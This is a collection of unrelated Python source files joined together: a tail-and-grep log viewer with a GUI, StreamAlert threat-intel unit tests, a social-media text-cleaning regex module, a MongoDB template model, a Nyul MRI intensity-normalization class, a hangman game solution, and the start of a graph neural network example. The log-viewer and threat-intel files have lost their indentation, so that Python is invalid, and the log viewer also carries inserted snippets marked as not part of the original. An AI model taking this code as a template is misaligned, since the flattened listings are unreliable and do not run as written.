@param lines_queue message queue containing the lines to pass to the gui
"""
stop = None
worker = None
while True:
item = filter_queue.get()
if worker is not None:
stop.set()
worker.join()
if item == _STOP_MESSAGE:
break
(filename, filters) = item
stop = threading.Event()
worker = threading.Thread(
target=file_observer_body,
args=(filename, lines, interval, filters, lines_queue, stop))
worker.start()
def last(lines, iterable):
"""
Yield last `lines` lines, extracted from `iterable`.
Flush the buffer of lines once the EOF sentinel is received. When this
happens, the function will return all the new lines generated.
@param lines number of lines to buffer (if equal to LINES_UNLIMITED, then
all the lines will be buffered)
@param iterable iterable containing lines to be processed.
"""
def noteof(aggregate):
(i, line) = aggregate
return line is not EOF
lines = lines if lines != LINES_UNLIMITED else None
# Fill the buffer of lines, until an EOF is received
for line in deque(takewhile(noteof, iterable), maxlen=lines):
yield line
yield next(iterable)
# Now return each item produced by the iterable
for line in iterable:
yield line
def lineenumerate(iterable):
"""
Return a generator which prepend a line number in front of each line
extracted from the given iterable.
The function properly takes into account EOF messages by yielding them
without increase the line number.
"""
i = 1
for line in iterable:
yield (i, line)
if line is not EOF:
i += 1
def tail_f(filename):
"""
Emulate the behaviour of `tail -f`.
Keep reading from the end of the file, and yield lines as soon as they are
added to the file. The function yields the EOF sentinel when the end of the
file is reached: this lets the caller wait a small amount of time before
trying to read new data.
@param filename name of the file to observe
"""
with open(filename) as f:
while True:
for line in f:
yield line
yield EOF
# Kind of rewind
where = f.tell()
f.seek(where)
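# Hedged illustration (not part of the original module): consuming tail_f() directly; the
# EOF sentinel tells the caller when it is safe to sleep before polling again.
def _example_follow(filename, interval=SLEEP_INTERVAL):
    for line in tail_f(filename):
        if line is EOF:
            time.sleep(interval)
            continue
        print(line, end='')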
def grep_e(*exps):
"""
Emulate the behaviour of `grep -e PATTERN [-e PATTERN ...]`.
Return a function which will try to match an input string against the set
of loaded regular expressions.
@param exps list of regular expressions
"""
regexps = [re.compile(exp) for exp in exps]
def wrapper(aggregate):
"""
Match input string with the set of preloaded regular expressions.
If the EOF sentinel is received, a fake match is generated (to wake up
possibly blocked callers).
@param aggregate (line number, line) tuple to check for regular expression matches.
@return True if the line matches any expression or is the EOF sentinel.
"""
(i, line) = aggregate
return line == EOF or any([reg.search(line) for reg in regexps])
return wrapper
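# Hedged illustration (not part of the original module): grep_e builds a predicate over
# (line_number, line) pairs, so it composes directly with filter().
def _example_grep():
    matcher = grep_e('ERROR', 'WARN')
    sample = [(1, 'ERROR boom'), (2, 'all good'), (3, EOF)]
    return [pair for pair in sample if matcher(pair)]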
@debug
def file_observer_body(filename, lines, interval, filters, lines_queue, stop):
"""
Body function of thread waiting for file content changes.
The thread will poll `filename` every `iterval` seconds looking for new
lines; as soon as new lines are read from the file, these are filtered
depending on `filters`, and the ones matching given criteria are put into the
synchronized `lines_queue`.
@param filename filename to poll
@param lines limit the number of lines produced by calling `tail_f`
@param interval polling interval
@param filters iterable of regexp filters to apply to the file content
@param lines_queue synchronized queue containing lines matching criteria
@param stop `threading.Event` object, used to stop the thread.
"""
line_buffer = []
for (i, line) in filter(grep_e(*filters), last(lines, lineenumerate(tail_f(filename)))):
if stop.isSet():
break
if (line is EOF and line_buffer) or (len(line_buffer) == _BATCH_LIMIT):
lines_queue.put(line_buffer)
#print '+', len(line_buffer), 'qsize', lines_queue.qsize()
line_buffer = []
if line is EOF:
            # We reached the EOF, hence wait for new content
time.sleep(interval)
continue
line_buffer.append((i, line))
def gui_updater_body(gui, lines_queue):
"""
Body function of the thread in charge of update the gui text area.
@param gui `Gui` object to update.
@param lines_queue message queue containing lines used to update the gui.
"""
while True:
lines = lines_queue.get()
#print '-', lines_queue.qsize()
if lines == _STOP_MESSAGE:
break
gui.append_text(lines)
@debug
def quit(filter_queue, lines_queue):
"""
Invoked by the GUI when the main window has been closed.
"""
filter_queue.put(_STOP_MESSAGE)
lines_queue.put(_STOP_MESSAGE)
@debug
def apply_filters(filename, filters, gui, filter_queue):
"""
Invoked by the GUI when a new filter is entered.
Clear the gui and queue the received filter into the shared synchronized
queue.
@param filename the name of the file to analyze
@param gui `Gui` object to update.
@param filters collection of string filters
@param filter_queue message queue shared with working thread.
"""
gui.clear_text()
filter_queue.put((filename, filter(None, filters)))
def _build_parser():
"""
Return a command-line arguments parser.
"""
parser = ArgumentParser(
description='Filter the content of a file, dynamically')
parser.add_argument(
'filename', default='', nargs='?', help='Filename to filter.',
metavar='FILENAME')
parser.add_argument(
'-s', '--sleep-interval', dest='interval', default=SLEEP_INTERVAL,
type=float, help='Sleep SLEEP_INTERVAL seconds between iterations',
metavar='SLEEP_INTERVAL')
parser.add_argument(
'-l', '--limit', dest='limit', default=LINES_LIMIT, type=int,
help='Number of lines to display in the text area', metavar='LIMIT')
parser.add_argument(
'-e', '--regexp', dest='filters', action='append',
help='Filter presets', metavar='FILTERS')
parser.add_argument(
'--font', dest='font', help='Font used by the application')
parser.add_argument(
'--version', action='version',
version='%(prog)s {0}'.format(__version__),
help='print the application version and quit')
return parser
def _main():
parser = _build_parser()
args = parser.parse_args()
# create the array of filters
filters = args.filters if args.filters else []
# create communication queues, shared between threads
filter_queue = queue.Queue()
lines_queue = queue.Queue()
gui = Gui(
None, font=args.font, filename=args.filename, filters=filters,
scroll_limit=args.limit)
gui.register_listener('quit', quit, filter_queue, lines_queue)
gui.register_listener('new_filter', apply_filters, gui, filter_queue)
if args.filename and args.filters:
gui.on_press_enter()
filter_thread_spawner = threading.Thread(
target=filter_thread_spawner_body,
args=(args.limit, args.interval, filter_queue, lines_queue))
filter_thread_spawner.start()
gui_updater = threading.Thread(
target=gui_updater_body, args=(gui, lines_queue))
gui_updater.start()
gui.mainloop()
if __name__ == '__main__':
_main()
| 2.140625 | 2 |
tests/unit/stream_alert_rule_processor/test_threat_intel.py | ashmere/streamalert | 1 | 12786317 | <filename>tests/unit/stream_alert_rule_processor/test_threat_intel.py
"""
Copyright 2017-present, Airbnb Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# pylint: disable=protected-access,no-self-use
from nose.tools import (
assert_list_equal,
assert_equal,
assert_is_instance,
assert_items_equal
)
from stream_alert.rule_processor.threat_intel import StreamThreatIntel
class TestStreamThreatIntel(object):
"""Test class for StreamThreatIntel"""
def setup(self):
"""Setup before each method"""
        # Clear out the cached intelligence and config to avoid conflicts between tests
StreamThreatIntel._StreamThreatIntel__intelligence.clear() # pylint: disable=no-member
StreamThreatIntel._StreamThreatIntel__config.clear() # pylint: disable=no-member
def test_read_compressed_files(self):
"""Theat Intel - Read compressed csv.gz files into a dictionary"""
intelligence = StreamThreatIntel.read_compressed_files('tests/unit/fixtures')
assert_is_instance(intelligence, dict)
assert_list_equal(sorted(intelligence.keys()),
sorted(['domain', 'md5', 'ip']))
assert_equal(len(intelligence['domain']), 10)
assert_equal(len(intelligence['md5']), 10)
assert_equal(len(intelligence['ip']), 10)
def test_read_compressed_files_not_exist(self):
"""Threat Intel - Location of intelligence files not exist"""
# self.threat_intel = ti.StreamThreatIntel('not/exist/dir')
intelligence = StreamThreatIntel.read_compressed_files('not/exist/dir')
assert_equal(intelligence, None)
def test_load_intelligence(self):
"""Threat Intel - Load intelligence to memory"""
test_config = {
'threat_intel': {
'enabled': True,
'mapping': {
'sourceAddress': 'ip',
'destinationDomain': 'domain',
'fileHash': 'md5'
}
}
}
StreamThreatIntel.load_intelligence(test_config, 'tests/unit/fixtures')
intelligence = StreamThreatIntel._StreamThreatIntel__intelligence # pylint: disable=no-member
expected_keys = ['domain', 'md5', 'ip']
assert_items_equal(intelligence.keys(), expected_keys)
assert_equal(len(intelligence['domain']), 10)
assert_equal(len(intelligence['md5']), 10)
assert_equal(len(intelligence['ip']), 10)
def test_do_not_load_intelligence(self):
"""Threat Intel - Do not load intelligence to memory when it is disabled"""
test_config = {
'threat_intel': {
'enabled': False,
'mapping': {
'sourceAddress': 'ip',
'destinationDomain': 'domain',
'fileHash': 'md5'
}
}
}
StreamThreatIntel.load_intelligence(test_config, 'tests/unit/fixtures')
intelligence = StreamThreatIntel._StreamThreatIntel__intelligence # pylint: disable=no-member
assert_equal(len(intelligence), 0)
def test_get_intelligence(self):
"""Threat Intel - get intelligence dictionary"""
test_config = {
'threat_intel': {
'enabled': True,
'mapping': {
'sourceAddress': 'ip',
'destinationDomain': 'domain',
'fileHash': 'md5'
}
}
}
StreamThreatIntel.load_intelligence(test_config, 'tests/unit/fixtures')
intelligence = StreamThreatIntel.get_intelligence()
expected_keys = ['domain', 'md5', 'ip']
assert_items_equal(intelligence.keys(), expected_keys)
assert_equal(len(intelligence['domain']), 10)
assert_equal(len(intelligence['md5']), 10)
assert_equal(len(intelligence['ip']), 10)
def test_get_config(self):
"""Threat Intel - get intelligence dictionary"""
test_config = {
'threat_intel': {
'enabled': True,
'mapping': {
'sourceAddress': 'ip',
'destinationDomain': 'domain',
'fileHash': 'md5'
}
}
}
StreamThreatIntel.load_intelligence(test_config, 'tests/unit/fixtures')
datatypes_ioc_mapping = StreamThreatIntel.get_config()
expected_keys = ['sourceAddress', 'destinationDomain', 'fileHash']
assert_items_equal(datatypes_ioc_mapping.keys(), expected_keys)
assert_equal(datatypes_ioc_mapping['sourceAddress'], 'ip')
assert_equal(datatypes_ioc_mapping['destinationDomain'], 'domain')
assert_equal(datatypes_ioc_mapping['fileHash'], 'md5')
def test_no_config_loaded(self):
"""Threat Intel - No datatypes_ioc_mapping config loaded if it is disabled"""
test_config = {
'threat_intel': {
'enabled': False,
'mapping': {
'sourceAddress': 'ip',
'destinationDomain': 'domain',
'fileHash': 'md5'
}
}
}
StreamThreatIntel.load_intelligence(test_config, 'tests/unit/fixtures')
datatypes_ioc_mapping = StreamThreatIntel.get_config()
assert_equal(len(datatypes_ioc_mapping), 0)
| 2.25 | 2 |
social_regexp/processing.py | TezRomacH/social-regexp | 0 | 12786318 | <gh_stars>0
from typing import Pattern
import re
import string
from social_regexp.constants import (
HASH_TOKEN,
MENTION_TOKEN,
NON_RUSSIAN_CYRILLIC_LETTERS,
PHONE_TOKEN,
URL_TOKEN,
_blank_spaces,
_hashtags,
_mentions,
_phones,
_single_letter_word,
_spaces_before_punctuation,
_url_regex,
)
def not_contains_non_russian_cyrillic_letters(text: str) -> bool:
"""Checks if a text contains any non-russian but cyrillic letter."""
return all(letter not in NON_RUSSIAN_CYRILLIC_LETTERS for letter in text)
def url() -> Pattern[str]:
"""Returns a pattern to match URLs."""
return _url_regex
def spaces_before_punctuation() -> Pattern[str]:
"""Returns a pattern to match spaces before punctuation."""
return _spaces_before_punctuation
def single_letter_words() -> Pattern[str]:
"""Returns a pattern to match single letter words."""
return _single_letter_word
def blank_spaces() -> Pattern[str]:
"""Returns a pattern to match blank spaces."""
return _blank_spaces
def mentions() -> Pattern[str]:
"""Returns a pattern to match mentions from Twitter or Instagram."""
return _mentions
def hashtags() -> Pattern[str]:
"""Returns a pattern to match mentions from Twitter or Instagram."""
return _hashtags
def phones() -> Pattern[str]:
"""Returns a pattern to match phone numbers."""
return _phones
def remove_urls(text: str, repl: str = "") -> str:
"""Return new string with replaced URLs to `repl`."""
return re.sub(pattern=_url_regex, repl=repl, string=text)
def remove_spaces_before_punctuation(text: str) -> str:
"""Return new string without spaces before punctuations."""
return re.sub(pattern=_spaces_before_punctuation, repl=r"\1", string=text)
def remove_punctuation(text: str) -> str:
"""Return new string without punctuations."""
return text.translate(str.maketrans("", "", string.punctuation))
def remove_hashtags(text: str, repl: str = "") -> str:
"""Return new string with replaced Twitter/Instagram mentions to `repl`."""
return re.sub(pattern=_hashtags, repl=repl, string=text)
def remove_mentions(text: str, repl: str = "") -> str:
"""Return new string with replaced Twitter/Instagram mentions to `repl`."""
return re.sub(pattern=_mentions, repl=repl, string=text)
def remove_single_letter_words(text: str) -> str:
"""Return new string without single-letter words."""
return re.sub(pattern=_single_letter_word, repl="", string=text)
def remove_blank_spaces(text: str) -> str:
"""Return new string without blank spaces."""
return re.sub(pattern=_blank_spaces, repl=" ", string=text)
def remove_phones(text: str, repl: str = "") -> str:
"""Return new string with replaced phone numbers to `repl`."""
return re.sub(pattern=_phones, repl=repl, string=text)
def preprocess_text(text: str) -> str:
"""Return new string with tokenized and processed text."""
result = remove_mentions(text, repl=MENTION_TOKEN)
result = remove_phones(result, repl=PHONE_TOKEN)
result = remove_urls(result, repl=URL_TOKEN)
result = remove_hashtags(result, repl=HASH_TOKEN)
result = remove_blank_spaces(result).strip()
result = remove_spaces_before_punctuation(result)
return result
__all__ = [
"not_contains_non_russian_cyrillic_letters",
"url",
"spaces_before_punctuation",
"single_letter_words",
"blank_spaces",
"mentions",
"phones",
"remove_urls",
"remove_spaces_before_punctuation",
"remove_punctuation",
"remove_mentions",
"remove_single_letter_words",
"remove_blank_spaces",
"remove_phones",
"preprocess_text",
"remove_hashtags",
]
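# Minimal usage sketch (not part of the original module): shows preprocess_text
# on a made-up tweet-like string. The exact replacement tokens depend on the
# values defined in social_regexp.constants.
if __name__ == "__main__":
    sample = "@alice check https://example.com #news , call +1 555 123 4567"
    print(preprocess_text(sample))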
| 3.25 | 3 |
app/ztp/mongo/models/template.py | cmlccie/rapid-ztp | 7 | 12786319 | <filename>app/ztp/mongo/models/template.py
"""Template MongoDB data model.
Copyright (c) 2019 Cisco and/or its affiliates.
This software is licensed to you under the terms of the Cisco Sample
Code License, Version 1.1 (the "License"). You may obtain a copy of the
License at
https://developer.cisco.com/docs/licenses
All use of the material herein must be in accordance with the terms of
the License. All rights not expressly granted by the License are
reserved. Unless required by applicable law or agreed to separately in
writing, software distributed under the License is distributed on an "AS
IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
or implied.
"""
from datetime import datetime
from hashlib import sha256
from mongoengine import (
DateTimeField, DynamicDocument, StringField, signals,
)
class Template(DynamicDocument):
"""Template document."""
name = StringField(required=True, unique=True)
template = StringField(required=True)
sha256 = StringField()
updated = DateTimeField()
meta = {
"collection": "templates",
"indexes": [
"name",
"sha256",
]
}
@classmethod
def pre_save(cls, sender, document, **kwargs):
"""Update the template attributes before saving the document."""
assert isinstance(document, Template)
document.updated = datetime.utcnow()
document.sha256 = sha256(document.template.encode("utf-8")).hexdigest()
signals.pre_save.connect(
Template.pre_save,
sender=Template
)
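# Usage sketch (not part of the original module; assumes a reachable MongoDB
# instance and an illustrative database name). The pre_save signal above fills
# in `sha256` and `updated` automatically when the document is saved:
#   from mongoengine import connect
#   connect("ztp")
#   tpl = Template(name="switch-base", template="hostname {{ name }}")
#   tpl.save()
#   print(tpl.sha256, tpl.updated)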
| 2.078125 | 2 |
intensity_normalization/normalize/nyul.py | AlaSummer/intensity-normalization | 0 | 12786320 | <reponame>AlaSummer/intensity-normalization<filename>intensity_normalization/normalize/nyul.py
"""Nyul & Udupa piecewise linear histogram matching normalization
Author: <NAME> <<EMAIL>>
Created on: 02 Jun 2021
"""
from __future__ import annotations
__all__ = ["NyulNormalize"]
import argparse
import builtins
import collections.abc
import typing
import numpy as np
import numpy.typing as npt
from scipy.interpolate import interp1d
import intensity_normalization.errors as intnorme
import intensity_normalization.normalize.base as intnormb
import intensity_normalization.typing as intnormt
import intensity_normalization.util.io as intnormio
class NyulNormalize(intnormb.DirectoryNormalizeCLI):
"""Nyul & Udupa piecewise linear histogram matching normalization
Args:
        output_min_value: value to which the min percentile is mapped in the
            normalized output image
        output_max_value: value to which the max percentile is mapped in the
            normalized output image
        min_percentile: min percentile to account for while finding the
            standard histogram
        max_percentile: max percentile to account for while finding the
            standard histogram
        percentile_after_min: first percentile after the min used for finding
            the standard histogram (percentile_step creates intermediate percentiles)
        percentile_before_max: last percentile before the max used for finding
            the standard histogram (percentile_step creates intermediate percentiles)
        percentile_step: step between percentile_after_min and
            percentile_before_max for finding the standard histogram
"""
def __init__(
self,
*,
output_min_value: builtins.float = 1.0,
output_max_value: builtins.float = 100.0,
min_percentile: builtins.float = 1.0,
max_percentile: builtins.float = 99.0,
percentile_after_min: builtins.float = 10.0,
percentile_before_max: builtins.float = 90.0,
percentile_step: builtins.float = 10.0,
):
super().__init__()
self.output_min_value = output_min_value
self.output_max_value = output_max_value
self.min_percentile = min_percentile
self.max_percentile = max_percentile
self.percentile_after_min = percentile_after_min
self.percentile_before_max = percentile_before_max
self.percentile_step = percentile_step
self._percentiles: npt.ArrayLike | None = None
self.standard_scale: npt.ArrayLike | None = None
def normalize_image(
self,
image: intnormt.ImageLike,
/,
mask: intnormt.ImageLike | None = None,
*,
modality: intnormt.Modalities = intnormt.Modalities.T1,
) -> intnormt.ImageLike:
voi = self._get_voi(image, mask, modality=modality)
landmarks = self.get_landmarks(voi)
if self.standard_scale is None:
msg = "This class must be fit before being called."
raise intnorme.NormalizationError(msg)
f = interp1d(landmarks, self.standard_scale, fill_value="extrapolate")
normalized: intnormt.ImageLike = f(image)
return normalized
@property
def percentiles(self) -> npt.NDArray:
if self._percentiles is None:
percs = np.arange(
self.percentile_after_min,
self.percentile_before_max + self.percentile_step,
self.percentile_step,
)
_percs = ([self.min_percentile], percs, [self.max_percentile])
self._percentiles = np.concatenate(_percs)
assert isinstance(self._percentiles, np.ndarray)
return self._percentiles
def get_landmarks(self, image: intnormt.ImageLike, /) -> npt.NDArray:
landmarks = np.percentile(image, self.percentiles)
return landmarks # type: ignore[return-value]
def _fit(
self,
images: collections.abc.Sequence[intnormt.ImageLike],
/,
masks: collections.abc.Sequence[intnormt.ImageLike] | None = None,
*,
modality: intnormt.Modalities = intnormt.Modalities.T1,
**kwargs: typing.Any,
) -> None:
"""Compute standard scale for piecewise linear histogram matching
Args:
images: set of NifTI MR image paths which are to be normalized
masks: set of corresponding masks (if not provided, estimated)
modality: modality of all images
"""
n_percs = len(self.percentiles)
standard_scale = np.zeros(n_percs)
n_images = len(images)
if masks is not None and n_images != len(masks):
raise ValueError("There must be an equal number of images and masks.")
for i, (image, mask) in enumerate(intnormio.zip_with_nones(images, masks)):
voi = self._get_voi(image, mask, modality=modality)
landmarks = self.get_landmarks(voi)
min_p = np.percentile(voi, self.min_percentile)
max_p = np.percentile(voi, self.max_percentile)
f = interp1d([min_p, max_p], [self.output_min_value, self.output_max_value])
landmarks = np.array(f(landmarks))
standard_scale += landmarks
self.standard_scale = standard_scale / n_images
def save_additional_info(
self,
args: argparse.Namespace,
**kwargs: typing.Any,
) -> None:
if args.save_standard_histogram is not None:
self.save_standard_histogram(args.save_standard_histogram)
def save_standard_histogram(self, filename: intnormt.PathLike) -> None:
if self.standard_scale is None:
msg = "This class must be fit before being called."
raise intnorme.NormalizationError(msg)
np.save(filename, np.vstack((self.standard_scale, self.percentiles)))
def load_standard_histogram(self, filename: intnormt.PathLike) -> None:
data = np.load(filename)
self.standard_scale = data[0, :]
self._percentiles = data[1, :]
@staticmethod
def name() -> builtins.str:
return "nyul"
@staticmethod
def fullname() -> builtins.str:
return "Nyul & Udupa"
@staticmethod
def description() -> builtins.str:
desc = "Perform piecewise-linear histogram matching per "
desc += "Nyul and Udupa given a set of MR images."
return desc
@staticmethod
def add_method_specific_arguments(
parent_parser: argparse.ArgumentParser,
) -> argparse.ArgumentParser:
parser = parent_parser.add_argument_group("method-specific arguments")
parser.add_argument(
"-ssh",
"--save-standard-histogram",
default=None,
type=intnormt.save_file_path(),
help="Save the standard histogram fit by the method.",
)
parser.add_argument(
"-lsh",
"--load-standard-histogram",
default=None,
type=intnormt.file_path(),
help="Load a standard histogram previously fit by the method.",
)
parser.add_argument(
"--output-min-value",
type=float,
default=1.0,
help="Value 'min-percentile' mapped to for output normalized image.",
)
parser.add_argument(
"--output-max-value",
type=float,
default=100.0,
help="Value 'max-percentile' mapped to for output normalized image.",
)
parser.add_argument(
"--min-percentile",
type=float,
default=1.0,
help="Min. percentile to account for while finding standard histogram.",
)
parser.add_argument(
"--max-percentile",
type=float,
default=99.0,
help="Max. percentile to account for while finding standard histogram.",
)
parser.add_argument(
"--percentile-after-min",
type=float,
default=10.0,
help="Percentile after min. for finding standard histogram "
"('percentile-step' creates intermediate percentiles between "
"this and 'percentile-before-max').",
)
parser.add_argument(
"--percentile-before-max",
type=float,
default=90.0,
help="Percentile before max. for finding standard histogram "
"('percentile-step' creates intermediate percentiles between "
"this and 'percentile-after-min').",
)
parser.add_argument(
"--percentile-step",
type=float,
default=10.0,
help="Percentile steps between 'percentile-after-min' and "
"'prev-percentile-before-max' for finding standard histogram",
)
return parent_parser
def call_from_argparse_args(
self, args: argparse.Namespace, /, **kwargs: typing.Any
) -> None:
if args.load_standard_histogram is not None:
self.load_standard_histogram(args.load_standard_histogram)
self.fit = lambda *args, **kwargs: None # type: ignore[assignment]
super().call_from_argparse_args(args)
@classmethod
def from_argparse_args(cls, args: argparse.Namespace, /) -> NyulNormalize:
return cls(
output_min_value=args.output_min_value,
output_max_value=args.output_max_value,
min_percentile=args.min_percentile,
max_percentile=args.max_percentile,
percentile_after_min=args.percentile_after_min,
percentile_before_max=args.percentile_before_max,
percentile_step=args.percentile_step,
)
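# Usage sketch (not part of the library code): fit the standard histogram on a
# few synthetic volumes and normalize one of them. Assumes the base class
# exposes the public `fit` wrapper around `_fit` defined above.
#   import numpy as np
#   images = [np.random.rand(16, 16, 16) * 100.0 for _ in range(3)]
#   nyul = NyulNormalize()
#   nyul.fit(images)
#   normalized = nyul.normalize_image(images[0])
#   nyul.save_standard_histogram("standard_histogram.npy")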
| 2.28125 | 2 |
pset (HangMan)/hangman.py | Hammad-001/MIT-6.0001-psets-Solutions | 2 | 12786321 | <filename>pset (HangMan)/hangman.py<gh_stars>1-10
# Problem Set 2, hangman.py
# Name: <NAME>
# Collaborators: None
# Hangman Game
# -----------------------------------
import random
import string
WORDLIST_FILENAME = "words.txt"
def load_words():
"""
Returns a list of valid words. Words are strings of lowercase letters.
Depending on the size of the word list, this function may
take a while to finish.
"""
print("Loading word list from file...")
# inFile: file
inFile = open(WORDLIST_FILENAME, 'r')
# line: string
line = inFile.readline()
# wordlist: list of strings
wordlist = line.split()
print(" ", len(wordlist), "words loaded.")
return wordlist
# choosing random word
def choose_word(wordlist):
"""
wordlist (list): list of words (strings)
Returns a word from wordlist at random
"""
word = random.choice(wordlist)
return word
# -----------------------------------
def is_word_guessed(secret_word, letters_guessed):
'''
secret_word: string, the word the user is guessing; assumes all letters are
lowercase
letters_guessed: list (of letters), which letters have been guessed so far;
assumes that all letters are lowercase
returns: boolean, True if all the letters of secret_word are in letters_guessed;
False otherwise
'''
for alpha in secret_word:
if alpha not in letters_guessed:
return False
return True
def get_guessed_word(secret_word, letters_guessed):
'''
secret_word: string, the word the user is guessing
letters_guessed: list (of letters), which letters have been guessed so far
returns: string, comprised of letters, underscores (_), and spaces that represents
which letters in secret_word have been guessed so far.
'''
stringofwords = ' '
for i in range(len(secret_word)):
if secret_word[i] in letters_guessed:
stringofwords = stringofwords+' '+secret_word[i]
else:
stringofwords = stringofwords + ' _ '
return stringofwords
def get_available_letters(letters_guessed):
'''
letters_guessed: list (of letters), which letters have been guessed so far
returns: string (of letters), comprised of letters that represents which letters have not
yet been guessed.
'''
letters = string.ascii_lowercase
for i in range(len(letters_guessed)):
if letters_guessed[i] in letters:
letters = letters.replace(letters_guessed[i], '')
return letters
def hangman(secret_word):
'''
secret_word: string, the secret word to guess.
Starts up an interactive game of Hangman.
* At the start of the game, let the user know how many
letters the secret_word contains and how many guesses s/he starts with.
* The user should start with 6 guesses
* Before each round, you should display to the user how many guesses
s/he has left and the letters that the user has not yet guessed.
* Ask the user to supply one guess per round. Remember to make
sure that the user puts in a letter!
* The user should receive feedback immediately after each guess
about whether their guess appears in the computer's word.
* After each guess, you should display to the user the
partially guessed word so far.
Follows the other limitations detailed in the problem write-up.
'''
print("Welcome to the Game Hangman!")
print("I am thinking of a word which is",len(secret_word),'long')
print("--------------------")
Guesses = 6
Warnings = 3
letters_guessed = []
vowels = ['a', 'e', 'i', 'u', 'o']
while Guesses > 0 and is_word_guessed(secret_word,letters_guessed) == False:
print("You have", Warnings, 'Warnings left.')
print("You have",Guesses,'guesses left.')
print("Available Letters:",get_available_letters(letters_guessed))
guess = input('Please guess a letter:')
guess = guess.strip().lower()
if guess in secret_word:
if guess in letters_guessed:
if Warnings > 0:
Warnings -= 1
print("Oops! You have already guessed that letter. You now have",Warnings,"Warnings left"
"\n Word: ",get_guessed_word(secret_word,letters_guessed))
else:
Guesses -=1
print("Oops! You have already guessed that letter. Word:",get_guessed_word(secret_word, letters_guessed))
elif guess not in letters_guessed:
letters_guessed.append(guess)
print('Good Guess!',get_guessed_word(secret_word,letters_guessed))
elif guess.isalpha() == False or len(guess) != 1:
if Warnings > 0:
Warnings -= 1
print("Oops! That is not a valid letter. You have", Warnings, "Warnings left.\n Word:",
get_guessed_word(secret_word, letters_guessed))
else:
Guesses -= 1
print("Oops! That is not a valid letter. Word:",
get_guessed_word(secret_word, letters_guessed))
            elif guess in vowels:
                # an incorrect vowel guess costs two guesses instead of one
                Guesses -= 2
                print("Oops! That letter is not in my word:", get_guessed_word(secret_word, letters_guessed))
else:
print("Oops! That letter is not in my word:", get_guessed_word(secret_word, letters_guessed))
Guesses -= 1
print("--------------------")
if is_word_guessed(secret_word,letters_guessed) == True:
print("Congratulations, You Won!")
print("Your Score is", Guesses * len(secret_word))
elif is_word_guessed(secret_word,letters_guessed) == False:
print("Sorry! you ran out of guesses. The word was", secret_word)
# When you've completed your hangman function, scroll down to the bottom
# of the file and uncomment the first two lines to test
#(hint: you might want to pick your own
# secret_word while you're doing your own testing)
# -----------------------------------
def match_with_gaps(my_word, other_word):
'''
my_word: string with _ characters, current guess of secret word
other_word: string, regular English word
returns: boolean, True if all the actual letters of my_word match the
corresponding letters of other_word, or the letter is the special symbol
_ , and my_word and other_word are of the same length;
False otherwise:
'''
my_word = my_word.replace(' ','')
if len(other_word) == len(my_word):
for i in range(len(my_word)):
if my_word[i] == other_word[i]:
continue
if my_word[i] == '_' and other_word[i] not in list(my_word):
continue
else:
return False
return True
else:
return False
def show_possible_matches(my_word):
'''
my_word: string with _ characters, current guess of secret word
returns: nothing, but should print out every word in wordlist that matches my_word
Keep in mind that in hangman when a letter is guessed, all the positions
at which that letter occurs in the secret word are revealed.
Therefore, the hidden letter(_ ) cannot be one of the letters in the word
that has already been revealed.
'''
words = ""
count =0
for word in wordlist:
if count % 5 == 0:
words += '\n'
if match_with_gaps(my_word,word):
words += word +" "
count += 1
else:
continue
if words == '':
print("No match found!")
else:
print(words)
def hangman_with_hints(secret_word):
'''
secret_word: string, the secret word to guess.
Starts up an interactive game of Hangman.
* At the start of the game, let the user know how many
letters the secret_word contains and how many guesses s/he starts with.
* The user should start with 6 guesses
* Before each round, you should display to the user how many guesses
s/he has left and the letters that the user has not yet guessed.
* Ask the user to supply one guess per round. Make sure to check that the user guesses a letter
* The user should receive feedback immediately after each guess
about whether their guess appears in the computer's word.
* After each guess, you should display to the user the
partially guessed word so far.
* If the guess is the symbol *, print out all words in wordlist that
matches the current guessed word.
Follows the other limitations detailed in the problem write-up.
'''
print("Welcome to the Game Hangman!")
print("I am thinking of a word which is", len(secret_word), 'long')
print("--------------------")
Guesses = 6
Warnings = 3
letters_guessed = []
vowels = ['a','e','i','u','o']
while Guesses > 0 and is_word_guessed(secret_word, letters_guessed) == False:
print("You have", Warnings, 'Warnings left.')
print("You have", Guesses, 'guesses left.')
print("Available Letters:", get_available_letters(letters_guessed))
guess = input('Please guess a letter:')
guess = guess.strip().lower()
if guess == '*':
show_possible_matches(get_guessed_word(secret_word, letters_guessed))
elif guess in secret_word:
if guess in letters_guessed:
if Warnings > 0:
Warnings -= 1
print("Oops! You have already guessed that letter. You now have", Warnings, "Warnings left"
"\n Word: ",
get_guessed_word(secret_word, letters_guessed))
else:
Guesses -= 1
print("Oops! You have already guessed that letter. Word:",
get_guessed_word(secret_word, letters_guessed))
elif guess not in letters_guessed:
letters_guessed.append(guess)
print('Good Guess!', get_guessed_word(secret_word, letters_guessed))
elif guess.isalpha() == False or len(guess) != 1:
if Warnings > 0:
Warnings -= 1
print("Oops! That is not a valid letter. You have", Warnings, "Warnings left.\n Word:",
get_guessed_word(secret_word, letters_guessed))
else:
Guesses -= 1
print("Oops! That is not a valid letter. Word:",
get_guessed_word(secret_word, letters_guessed))
            elif guess in vowels:
                # an incorrect vowel guess costs two guesses instead of one
                Guesses -= 2
                print("Oops! That letter is not in my word:", get_guessed_word(secret_word, letters_guessed))
else:
print("Oops! That letter is not in my word:", get_guessed_word(secret_word, letters_guessed))
Guesses -= 1
print("--------------------")
if is_word_guessed(secret_word, letters_guessed) == True:
print("Congratulations, You Won!")
print("Your Score is", Guesses * len(secret_word))
elif is_word_guessed(secret_word, letters_guessed) == False:
print("Sorry! you ran out of guesses. The word was", secret_word)
if __name__ == "__main__":
wordlist = load_words()
# wordlist = _words()
# To test part 1, comment out the pass line above and
# uncomment the following three lines.
# secret_word = 'apple'
# letters_guessed = ['a','a','l','r','z']
# print(get_guessed_word(secret_word, letters_guessed))
# To test part 2, comment out the pass line above and
# uncomment the following two lines.
# secret_word = choose_word(wordlist)
# hangman(secret_word)
###############
# To test part 3 re-comment out the above lines and
# uncomment the following two lines.
# secret_word = choose_word(wordlist)
# hangman_with_hints(secret_word)
| 3.9375 | 4 |
examples/graph_prediction/general_gnn.py | JonaBecher/spektral | 2,145 | 12786322 | """
This example implements the model from the paper
> [Design Space for Graph Neural Networks](https://arxiv.org/abs/2011.08843)<br>
> <NAME>, <NAME>, <NAME>
using the PROTEINS dataset.
